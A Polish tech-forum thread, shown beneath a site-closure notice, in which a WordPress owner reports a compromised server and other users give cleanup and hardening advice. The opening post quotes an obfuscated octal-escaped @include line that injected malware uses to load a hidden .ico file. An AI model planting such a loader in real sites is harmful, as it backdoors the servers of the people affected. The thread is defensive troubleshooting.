Skocz do zawartości
Zamknięcie Forum PC LAB

Szanowny Użytkowniku,

Informujemy, że za 30 dni tj. 30 listopada 2024 r. serwis internetowy Forum PC LAB zostanie zamknięty.

Administrator Serwisu Forum PC LAB - Ringier Axel Springer Polska sp. z o.o. z siedzibą w Warszawie: wypowiada całość usług Serwisu Forum PC LAB z zachowaniem miesięcznego okresu wypowiedzenia.

Administrator Serwisu Forum PC LAB informuje, że:

  1. Z dniem 29 listopada 2024 r. zakończy się świadczenie wszystkich usług Serwisu Forum PC LAB. Ważną przyczyną uzasadniającą wypowiedzenie jest zamknięcie Serwisu Forum PC LAB
  2. Dotychczas zamowione przez Użytkownika usługi Serwisu Forum PC LAB będą świadczone w okresie wypowiedzenia tj. do dnia 29 listopada 2024 r.
  3. Po ogłoszeniu zamknięcia Serwisu Forum od dnia 30 października 2024 r. zakładanie nowych kont w serwisie Forum PC LAB nie będzie możliwe
  4. Wraz z zamknięciem Serwisu Forum PC LAB, tj. dnia 29 listopada 2024 r. nie będzie już dostępny katalog treści Forum PC LAB. Do tego czasu Użytkownicy Forum PC LAB mają dostęp do swoich treści w zakładce "Profil", gdzie mają możliwość ich skopiowania lub archiwizowania w formie screenshotów.
  5. Administrator danych osobowych Użytkowników - Ringier Axel Springer Polska sp. z o.o. z siedzibą w Warszawie zapewnia realizację praw podmiotów danych osobowych przez cały okres świadczenia usług Serwisu Forum PC LAB. Szczegółowe informacje znajdziesz w Polityce Prywatności

Administrator informuje, iż wraz z zamknięciem Serwisu Forum PC LAB, dane osobowe Użytkowników Serwisu Forum PC LAB zostaną trwale usunięte ze względu na brak podstawy ich dalszego przetwarzania. Proces trwałego usuwania danych z kopii zapasowych może przekroczyć termin zamknięcia Forum PC LAB o kilka miesięcy. Wyjątek może stanowić przetwarzanie danych użytkownika do czasu zakończenia toczących się postepowań.

Yourek

Wordpress - wirusy na serwerze

Rekomendowane odpowiedzi

Witam,

Mam stronę internetową opartą na WordPress. Na serwerze pojawiają mi się dziwne katalogi typu "zd4kc" itp. W niektórym katalogach pojawiają mi się też pliki PHP o losowej nazwie np "dx8dsc.php" itp.  Zdarza się też, że pojawiają się pliki "index.php" w różnych katalogach o zawartości np "@include "\057va\162/w\167w/\166ho\163ts\05734\05716\06165\062/w\145bs\160ac\145/h\164tp\144oc\163/r\157ot\0577r\1611w\063s/\143ac\150e/\056c5\062b3\0608f\056ic\157";

Czy ktoś miał z czyms takim do czynienia? Wiecie może co jest przyczyną takiej sytuacji?

Z panelu administracyjnego Wordpress'a usunąłem niemal wszystkie wtyczki, zablokowałem możliwość dodawania komentarzy na stronie i aktualizuję Wordpress'a jeśli wyjdzie nowa wersja. 

Na serwerze mam wersję PHP 7.0.33

 

Z góry dziękuje za pomoc.

Pozdrawiam.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Gdy zajmowałem się WP ładnych parę lat (5-6?) temu to miałem to samo. Nie pamiętam przyczyny ale wiem że podejrzewałem plugin który pozwalał używać php w widgetach tekstowych.

Ja się tego pozbyłem tak że ściągnąłem całą stronę, i jakimś programem (niestety wtedy jeszcze używałem Windowsa) zamieniłem wszystkie wystąpienia includów na podstawie jakiegoś powtarzającego się ciągu znaków. I te katalogi też jakoś masowo skasowałem ale nie pamiętam jak. Musisz namierzyć wszystko, nawet jeżeli jedno zostanie to będzie nadal problem. Sprawdź też bazę.

Druga sprawa to zabezpieczenia: jeżeli to jakiś vps to upewnij się że katalog www ma właściwe uprawnienia, żeby nie było że masz 777 :D Musi być coś w stylu 760 i user oraz grupa typu "apache" albo "www-data" w zależności na czym stoi sam serwer.

Do tego mocne hasła, captcha i opóźniacze+dzienne blokady przy błędnych hasłach (żeby ci nikt bruteforcem nie próbował tego łamać) to podstawy. 

 

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Dzięki za odpowiedź.

Uprawnienia na katalogach i plikach mam 755. 

Co ciekawe, zauważyłem że nawet niektóre pliki samego Wordpress'a są modyfikowane. Wtedy nawet ciężko pobrać na dysk i sprawdzić bo antywirus od razu je usuwa. Wtedy sprawdzam bezpośrednio na serwerze w edycji plików. Niestety kończy się to na podmianie całego pliku z kopii zapasowej lub oryginalnej instalacji Wordpress'a.

No nic, będę walczył dalej. Może w końcu uda mi się dojść do źródła problemu.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

No to jak ręcznie szukasz i zamieniasz to od razu ci mówię że nie dasz rady. U mnie było tego sporo. Jak się boisz o swoją maszynkę zrób wirtualkę z windowsem w virtualboksie, wyłącz na niej antywira i tam ściągnij i dłub. Musisz to jakimś automatem przeczesać bo inaczej utoniesz. Jeżeli hostujesz na VPSie czyli masz ssh to bashem byś to ogarnął (komenda sed w jakiejś pętli po katalogach). Tylko musisz sobie na sucho potestować.

I koniecznie sprawdź bazę.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Do przeskanowania plików możesz użyć wordfence. Porówna on skład wtyczek i szablonów z tym, co masz na serwerze i pokaże te, które mają dodatkową zawartość. Z plikami w uploads też powinien sobie poradzić.

Przy szukaniu wirusów lokalnie użyj programu astrogrep

1. w katalogu uploads, niech szuka plików zawierających <?php

2. Jeśli znajdziesz jakiś plik zawierający wirusa (długi ciąg losowych znaków na początku pliku), to kopiujesz fragment i szukasz w wp-content

Jak już masz wtyczki, upload i szablon czyste, to wywalasz wszystko z ftp na serwerze, wgrywasz czystą kopię wordpressa + wp-content ze swojego dysku.

Potem aktualizujesz szablon i wtyczki.

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Yourek,

W jednym zdaniu: nieduże szanse, że skutecznie samodzielnie rozwiążesz problem, ale jeżeli pominiesz większość "porad" napisanych powyżej, możesz spróbować w takiej kolejności:

1. backup, 2. blokada dostępu www (np. w .htaccess, na pewno nie za pomocą wtyczki w WP), 3. sprawdzenie zadań cron (jeżeli masz dostęp) i podejrzanych procesów (jeżeli masz dostęp), 4. usunięcie dodatkowych plików i usunięcie modyfikacji z pozostałych plików, 5. usunięcie ew. modyfikacji w bazie danych, 6. reset haseł (WP, baza danych) i 'saltów' w wp-config, 7. aktualizacja wtyczek jeżeli są w wersjach z podatnościami, 8. opcjonalnie utwardzanie (np. zmiana adresu logowania z jednoczesnym przyblokowanie bezpośredniego dostępu do xmlrpc.php i wp-login.php)

Wordfence będzie bardzo pomocny, o ile: 1. na Twoim koncie hostingowym będziesz mógł wykonać kompletne skanowanie (wszystkie pliki) - kwestia zasobów/parametrów, 2. Potrafisz zinterpretować wyniki tego skanowania.

 

Adam

Udostępnij tę odpowiedź


Odnośnik do odpowiedzi
Udostępnij na innych stronach

Jeśli chcesz dodać odpowiedź, zaloguj się

Komentowanie zawartości tej strony możliwe jest po zalogowaniu



Zaloguj się

  • Ostatnio przeglądający   0 użytkowników

    Brak zarejestrowanych użytkowników przeglądających tę stronę.

×
×
  • Dodaj nową pozycję...